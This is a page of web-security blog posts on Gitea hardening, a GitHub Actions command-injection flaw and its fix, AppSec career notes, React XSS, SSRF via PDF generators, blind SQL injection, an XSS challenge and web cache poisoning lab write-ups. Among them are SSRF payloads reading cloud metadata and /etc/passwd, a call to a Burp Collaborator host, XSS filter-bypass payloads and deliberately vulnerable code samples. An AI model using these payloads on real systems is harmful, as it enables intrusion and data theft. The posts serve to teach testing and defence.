Skip to content

Category: Web Security

Gitea: Configuration Hardening

Below are some of the configurations of Gitea that are useful for security hardening:

Config Reference: https://docs.gitea.io/en-us/config-cheat-sheet/

The more features we disable, the less attack surfaces we will face when using Gitea.

version: "3"

networks:
  gitea:
    external: false

volumes:
  gitea-data:
    driver: local
  gitea-config:
    driver: local

services:
  server:
    image: gitea/gitea@sha256:ef6279e13e223d956bc417f299a3530795afcf79f3af429a5c893262c550a648
    container_name: gitea
    environment:
      - USER_UID=1000
      - USER_GID=1000
      - GITEA__repository__DISABLE_DOWNLOAD_SOURCE_ARCHIVES=true
      - GITEA__repository__DISABLE_HTTP_GIT=true
      - GITEA__repository__repository.upload__ENABLED=false
      - GITEA__server__DISABLE_SSH=true
      - GITEA__security__DISABLE_GIT_HOOKS=true
      - GITEA__security__DISABLE_WEBHOOKS=true
      - GITEA__security__PASSWORD_COMPLEXITY=on
      - GITEA__security__MIN_PASSWORD_LENGTH=10
      - GITEA__attachment__ENABLED=false
      - GITEA__api__ENABLE_SWAGGER=false
      - GITEA__packages__ENABLED=false
      - GITEA__migrations__ALLOWED_DOMAINS=github.com,*.github.com
      - GITEA__repository__MAX_CREATION_LIMIT=0
      - GITEA__security__PASSWORD_HASH_ALGO=argon2
      - GITEA__mirror__DISABLE_NEW_PUSH=true
      - GITEA__service__DISABLE_REGISTRATION=true
      - GITEA__repository__DISABLED_REPO_UNITS=repo.issues, repo.ext_issues, repo.pulls, repo.wiki, repo.ext_wiki, repo.projects
      - GITEA__service__DEFAULT_ALLOW_CREATE_ORGANIZATION=false
      - GITEA__service__DEFAULT_USER_IS_RESTRICTED=true
      - GITEA__repository__DISABLE_MIGRATIONS=true # Set as false when there is new mirror
      - GITEA__mirror__DISABLE_NEW_PULL=true # Set as false when there is new mirror
    restart: always
    networks:
      - gitea
    volumes:
      - gitea-data:/var/lib/gitea
      - gitea-config:/etc/gitea
      - /etc/timezone:/etc/timezone:ro
      - /etc/localtime:/etc/localtime:ro
    ports:
      - "3000:3000"
      - "222:22"

How to integrate Gitea with Okta (Authentication)?

Start up Gitea

Create a docker.compose.yml file with the latest Gitea rootless image:

version: "3"

networks:
  gitea:
    external: false

services:
  server:
    image: gitea/gitea@sha256:ef6279e13e223d956bc417f299a3530795afcf79f3af429a5c893262c550a648
    container_name: gitea
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always
    networks:
      - gitea
    volumes:
      - ./gitea:/data
      - /etc/timezone:/etc/timezone:ro
      - /etc/localtime:/etc/localtime:ro
    ports:
      - "3000:3000"
      - "222:22"

Run a command to start Gitea as a docker image in your machine:

docker-compose --project-name gitea -f docker.compose.yml up -d
docker ps -a # Check if the containers are running

Go to localhost and you can see that a local instance of Gitea is running.

Okta integration

Create a Web app in Okta:

Configure the redirect URL: http://localhost:3000/user/oauth2/okta/callback

Save the Client Id and Client secret that will be input into Gitea

You must name the authentication to be the same name under the redirect url. In this case, I have name it as okta

http://localhost:3000/user/oauth2/okta/callback

The admin should paste the Client Id and Client secrets from Okta app to the Authentication Sources tab in “Site Administration”.

Test the integration between Gitea and Okta

Sign in with OpenID

You will be redirected to Okta for authentication (ensure MFA is enabled preferably with FIDO2)

If this is the first time that you login with Gitea, you will need to fill in your username and email address to create an account.

GH Actions Misconfiguration – causing Command Injection

Suppose you have a Github Actions script like below:

The script will be triggered when a new issue comment is added to the issue or a comment is edited.

name: GitHub Actions Demo
on:
  issue_comment:
    types: [created, edited]
jobs:
  Explore-GitHub-Actions:
    runs-on: ubuntu-latest
    steps:
      - run: echo "🎉 The job was automatically triggered by a ${{ github.event_name }} event."
      - run: echo "🐧 This job is now running on a ${{ runner.os }} server hosted by GitHub!"
      - run: echo "🔎 The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}."
      - run: echo ${{ github.event.comment.body }}

Notice that ${{ github.event.comment.body }} is used in the run step directly? This makes the script vulnerable to Command Injection. Why?

Read this: https://securitylab.github.com/research/github-actions-untrusted-input/#remediation

In this context, someone can inject commands to the GH Action script by adding their payload to the issue comment. The GH Action script is triggered every time there is a new issue comment.

Did you notice we can run echo bye? This is just a simple example but worse scenario can be reverse-shell (if you are using self-hosted GH Runners) or secrets theft.

See that we can echo bye

You can even attack in a stealth mode by deleting the comment immediately once the workflow is triggered.

How to prevent the issue?

Set the github context data in env variable before you use it in the run

[...]
      - env: # Add this
          BODY: ${{ github.event.comment.body }} # Add this
        run: echo "$BODY"

Add a new comment that contains a payload:

You can see the script is interpreting the comment body as string rather than interpolating it as a command to execute.

Notes on Finding Evasive Bugs (by James Kettle)

Highly recommend security researchers to watch this. The talk focuses more toward improving your methodology and mindset:

  1. Don’t look for defences; Start with the attacks first.
  2. Look for unfashionable flaws.
  3. Your understanding of a vulnerability concept may be corrupted. Don’t reply on internet searches to learn. Learn from the original sources.
  4. Recognise the fear from the new or unknown (Technique sounds cool but…)
  5. Recognise that you might think that something is an implausible idea. Don’t just try something and then give out if it does not work. Instead do this: Explain why the idea will not work unless condition X exists. Try the obvious to make sure that it is obviously secured.
  6. Invisible Chainlinks give you advantages. They can be related to a particular context, application specific knowledge, inconvenient. For example, param miner works well if you have the application specific knowledge.

Automation

  • Use automation to scan for clues about the application.
  • Scan to learn
    • Test Hypothesis
    • Ask question and iterate
  • When enumerating, focus on specific things rather than broad information to reduce noise.
    • Make asking questions cheap.
    • Develop your own framework.

Purpose of DevSecOps and its future

“…make sure that the constraint is not allowed to waste any time. Ever. It should never be waiting on other resource for anything, and it should always be working on the highest priority commitment the IT Operations organization has made to the rest of the enterprise. Always.”

The Phoenix project

The NUMBER ONE constraint in Security department is people.

It is unlikely we can hire enough people to match the number of developers and operations engineers.

The way to free up our constraint (people) is to try to automate as many tasks as possible so that the people can do the things that are unique and contextual.

Another way is to take a preventative approach by educating developers and ops engineers on best security practices that they need to follow (this means secure by defaults configurations, having documentation and guides). The famous Netflix’s paved roads….

any improvement not made at the constraint is just an illusion, yes?

The Phoenix project

Crafting your AppSec Learning Methodology

Information Security is a broad field with many specialties such as Infrastructure Security, Cloud Security, Container Security. DevOps automation and Application Security (Source Code / Design level) etc. In real life context, an Application Security may need to focus on a few specialties since modern applications are using Cloud PaaS / IaaS and Containers.

Since there are so many specialties to learn, you may get overwhelmed by the knowledge and how to apply what you learn on the actual context. I read an interesting Div0 post on a cybersecurity career discussion panel on this topic:

Many aspiring cybersecurity practitioners say they are passionate about cybersecurity. But they have no work to show/prove their passion. Don’t just say you are passionate. Do it, show it!

There’s no shortage of aspiring cybersecurity practitioners who want to learn. However, there’s a lack of drive on how they can contribute to the organization. Continuous learning in a fast-moving industry like cybersecurity is important. However, you should also focus on how you can apply your skills (emphasis mine).

Cybersecurity is not just about technical skills. In fact, picking up technical skills is the easy bit. Shaping your attitude and mindset in how you deliver the promise your clients entrusted in you plays a much bigger role.

An essential characteristic to have in the industry is Grit — the passion and sustained persistence towards long-term achievement.

In a wide discipline like cybersecurity, it is important to collaborate and bounce ideas with fellow practitioners — that’s how you push the boundary.

The mad rush to get all the fancy certifications is not healthy. There’s no point being certified but you still can’t get a complete grasp on security controls or even the fundamentals. Focus on building up your skillset, not the alphabets behind your name.

Often Application Security new joiners have to learn development skills on their own projects if they are not joining from development background. They may be pentesters, sysadmin, DevOps engineers or career changers coming from another field. Each of them have their own unique perspectives.

You need to understand development but…

If you see in many Application Security job descriptions, many companies require development background. This requirement ensures that you can empathize with the development team that you will be working closely with.

Be careful not to become too developer-like because you will lose independent assessment since you are too close to the development team. For example, some developer tells you that this SQL injection is not a risk since the string values come from hardcoded config file. If you get too close to dev team, you might accept the risk without pointing out additional caution.

However, from another independent perspective, this means that SQL injection can happen if a rogue developer / QA / devops change the config file to a SQLi payload. The long-term solution is actually to use parameterized query and prepared statement even though the values are hardcoded. However if you get too close to dev team, you will start to feel their pain and deadlines if the feature is not released on time. So you might not even suggest the team to pick a more secure approach. Or you might ask the team to add this suggestion to backlog. It remains to be seen whether the safer approach will be adopted since there is always another new feature to complete.

Security Champions might also struggle to give independent assessment especially since they are part of the dev team. Moreover, many of them are developers or QA and have deadline and user stories to complete as well. Therefore Security Champions cannot do it alone and need pairing with the internal Security SME to give a balanced assessment.

On the other hand, you are too far from the development team, you will start suggesting crazy security activities from some PDFs or slides that will never gain any traction with the development team. Many good ideas sound great in powerpoint slides but difficult to gain traction in practice because real world has more decision-making factors in which security is just one of them. You need to at least understand some of these major factors such as business risk appetite, ROI, regulatory requirements etc.

Not enough to learn Development

To understand Application Security in depth, the newbies have to pick up coding and software development concepts such as MVC etc. on their side projects or on the job. It will take time and requires a lot of experimentation, readings, note-taking and questioning.

You shouldn’t just learn coding like watching a Udemy course on Web Development or Mobile Development. After all, your job also consist of the security aspects of delivery. Most of the development courses will not mention Application security topics. This means that you need to create your own contexts to apply every topics that you have watched on Application Security.

An example of I apply newly learned security knowledge to coding

Recently, I attended an online webinar on building secure React applications. This is an informative talk with hands-on examples that I recommend people to watch.

My first thought is to find the React code that I wrote on my own.

import React from 'react';

const Option = (props) => {
    return (
        <div>
            <li>{props.name}</li>
            <button
                onClick={(e) => {
                    props.handleDeleteOption(props.name);
                }}
            >
                Remove
            </button>
        </div>
    );
};

export default Option;

Previously, my understanding was that ReactJS is secure by default library and XSS is difficult to achieve unless developer use dangerouslySetInnerHTML. But from the video, I updated my understanding of ReactJS and recognized more XSS attack surface.

Then I tried to modify my React component code to create the XSS vulnerability. Imagine the developer thinks that getting the name from props is safe to use in href.

import React from 'react';

const Option = (props) => {
    return (
        <div>
            <li>{props.name}</li>
            <a href={props.name}>Click for more info</a>
            <button
                onClick={(e) => {
                    props.handleDeleteOption(props.name);
                }}
            >
                Remove
            </button>
        </div>
    );
};

export default Option;

But if the attacker include JavaScript url, then there is a stored XSS issue.

From now, when I look at ReactJS code, I will also include such checks in my code review methodology. Or when I am looking at ReactJS app, I will be more awareness of more things to look out for such as href and src tags etc.

Testing for SSRF during PDF Generation

https://unsplash.com/photos/QvU0LNnr26U

How to test for SSRF during PDF Generation?

User input is reflected in the PDF.

HTML elements are parsed by the PDF Generator Libraries.

Research the specific types of data that can be parsed by the target’s PDF Generator Library in order to generate a payload

Payloads

If HTML is parsed directly:

Recon

<script>
  document.write(window.location.href); 
  document.write(window.location.hostname); 
  document.write(window.location.pathname); 
  document.write(window.location.protocol); 
  document.write(window.location.host); 
  document.write(window.location.port); 
</script>

Redirect with iframe

<iframe+src="http://localhost/?redirect=http://xxxx.burpcollaborator.net/x.png">

AWS

<iframe src="http://169.254.169.254/user-data">

Files

<iframe src="file:///etc/passwd">

WeasyPrint PDF Test

Trying to embed a secret file in the PDF? You can try this payload if the target is parsing a HTML page. One thing that you can do is host the index html file in Heroku etc. and pass it to the target’s PDF generation endpoint.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>WeasyPrint PDF Test</title>
    <link rel=attachment href="file:///{path_to_secret_file}">
</head>
<body>
    <h1>WeasyPrint PDF Test</h1>
</body>
</html>

In the PDF reader, open up the Attachment section and view the embedded file.

Resources

https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Ben-Sadeghipour-Owning-the-clout-through-SSRF-and-PDF-generators.pdf

Notes on Blind SQL Injection

https://portswigger.net/web-security/sql-injection/cheat-sheet

Lab: Blind SQL injection with conditional responses

https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses

In this lab, we are using the responses to enumerate the password of the “administrator” account. First, we need to perform a check on whether the “administrator” account exists and the length of the password. Once this is done, we will perform a substring query to enumerate each of the character of the password.

You can use Burp Repeater or Intruder to enumerate the password. I find both methods to be time-consuming. I wrote a script to enumerate the password instead. The script will look for “Welcome” value in the response. If it is true, the script will note down the character and continue to the next position until all the password character is enumerated.

Writeups on Free Challenges in BugBountyHunter

In this post, I will share some writeups on the free challenges in BugBountyHunter platform. I encourage everyone to check out the site https://www.bugbountyhunter.com/.

Cross-Site Scripting in Image Tag

https://www.bugbountyhunter.com/challenge?id=2

How does the feature works? If you select the dropdown option, the image will be rendered with special effects using CSS. In the img tag, we can see the selected option value will appear in class.

What could go wrong? The POST request looks suspicious.

Request

There is no server side validation of the imageClass value. You can send any value and it will be reflected in the response.

Response

We can try sending a few payloads to test for XSS issue. First, we can modify the imageClass value to imageClass=helloworld" onload="alert(1)". The response return a class="1" in the tag. We can try imageClass=helloworld" onclick="alert(1)". The response also return class="1" in the tag.

It seems like there is some blacklisting of some keywords such as onload or onclick etc. Hence we need to find the event handler method that is not blacklisted. Fortunately, this payload was not blocked: img2" onpointerup="alert('xss').

When we click on the image in the browser, the malicious script is executed.

Notes on Web Cache Poisoning

An attacker can use Web Cache Poisoning technique to send malicious response to other users. The poisoning will happen when certain unkeyed inputs are not validated by the application and allowing the malicious response to be cached.

Basic Example: Unkeyed Header

https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws/lab-web-cache-poisoning-with-an-unkeyed-header

In the request, the attacker discovered that the X-Forwarded-Host value will be reflected in response. The application tries to load a tracking.js file from cache resources. When the attacker passes a specific host in X-Forwarded-Host parameter, the tracking.js file will be loaded from another path <malicious host>/resources/js/tracking.js. Consequently, this allows the attacker to control the content of tracking.js file and load malicious JavaScript (potentially leading to issues such as XSS).

Unkeyed header

Case of Unknown Header

https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws/lab-web-cache-poisoning-targeted-using-an-unknown-header

In most situations, you will need to guess the unkeyed header. If you are using Burp Suite, then Paraminer will be a useful plugin to use.

First, go to the Target tab and select the paths in scope. Then right click on all these selected paths and click Guess Header.

If you are using Burp Pro, then you can see the result appearing in Dashboard - Issue activity.

Some sites may use the Vary header in the response to decide when to use the cached response or to refresh the response from the server. In the lab example, we can see that User-Agent is used to decide when the cached is used. To target your victim, you will need to know their User-Agent and then use the User-Agent values in your poison payload.

In our poison request, we have used X-Host and the victim’s User-Agent. Keep sending the request until you see the X-Cache is hit
In the Vary header, we see that User-Agent is used to decide the cache response decision.


DOM XSS from Web Cache Poisoning

https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws/lab-web-cache-poisoning-to-exploit-a-dom-vulnerability-via-a-cache-with-strict-cacheability-criteria

In this example, we see how Web Cache Poisoning can cause DOM XSS in an application. In some cases, an application is taking some properties value from a JSON and then use the value dynamically in a DOM. The assumption is that these properties values can be trusted since they are controlled by the application. However if an application is susceptible to Web Cache Poisoning, then these properties value can be controlled by the attacker.

In the example, we first see that that there is a host injection issue. If you use X-Forwarded-Host, then the injected host value will be reflected in the response.

In the response, we can also see that the injected host name will be used for retrieving a JSON value. Using the given exploit server (in the lab), we can see the access log showing that a user is making a GET request to retrieve geolocate.json file.

If we examine the JavaScript carefully, we can see that the country value is taken from the JSON file and then assigned to innerHTML. This is a classic DOM XSS attack surface to take note.

After doing some tracing of the original JSON value, we can see that there is a property called ‘country’ which contains the value that will be passed to the innerHTML.

UI showing the JSON value

Since we found the attack surface, we can now create a JSON file in the exploit server. This will return a JSON which contains the DOM XSS payload. Access-Control-Allow-Origin need to be wildcard in order for the object to be shared with the application.

After this is completed, then we can see that the Web Cache Poisoning will be successful and the DOM-XSS payload will be executed.

References

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection

https://portswigger.net/web-security/web-cache-poisoning

https://portswigger.net/research/practical-web-cache-poisoning